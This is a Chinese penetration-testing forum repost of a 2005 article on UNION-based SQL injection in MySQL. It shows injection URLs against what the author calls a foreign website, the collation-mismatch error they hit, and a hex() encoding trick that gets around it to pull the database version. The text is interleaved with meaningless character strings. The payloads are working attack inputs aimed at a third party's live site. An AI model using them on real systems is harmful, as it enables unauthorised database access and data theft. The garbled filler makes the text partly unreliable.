中国网络渗透测试联盟
标题:
MySQL注射时ErrorNo.1267的突破
[打印本页]
作者:
admin
时间:
2012-9-15 14:04
标题:
MySQL注射时ErrorNo.1267的突破
本文作者:SuperHei
3 Y5 Z0 x# T7 r* q
文章性质:原创
$ Y4 y* E. Z- {
发布日期:2005-10-18
. i: F- U' T6 K5 @
测试个国外的站时:
/ z& r2 f$ N& f( c
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
" v3 F1 I& F& x& \+ Z7 T
返回错误:
0 a4 ]# d9 i: P7 F c, t& z/ X
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
4 f. a+ ?" t6 }1 q: W
MySQL Error No. 126
- M- {% V: p5 Q
看来是union查询前后字符集(
http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html
)不同出现的。
3 L4 b- a/ t# ^. V
解决办法:转为其他编码如hex。
2 P) [7 l0 {: y! E
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
, a: c2 o4 q z3 J5 p5 v4 S
成功得到hex(version())的值为:
' i" Z# P* p( |; B9 B, P' O+ C
342E312E332D62657461
1 F. g \* x9 `7 L
回Mysql查询下得到:
; {" G9 h" t; N7 v
mysql> select 0x342E312E332D62657461;
* G0 s. u8 m( O; b( p" K
+------------------------+
! M' u4 C1 `+ B4 K) H* K+ e
| 0x342E312E332D62657461 |
& g* B# s3 l4 F3 Y* ?" I
+------------------------+
/ |, q9 {* k9 Q- C6 Q) n9 n3 y- @5 `
| 4.1.3-beta |
: c/ v ?! M6 I$ n6 {
+------------------------+
0 x7 P" g3 A3 t/ `0 s
1 row in set (0.00 sec)
6 ~: G. w1 U8 ~+ _2 Q6 I) j
* Z7 X i" Y8 a% O6 D
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2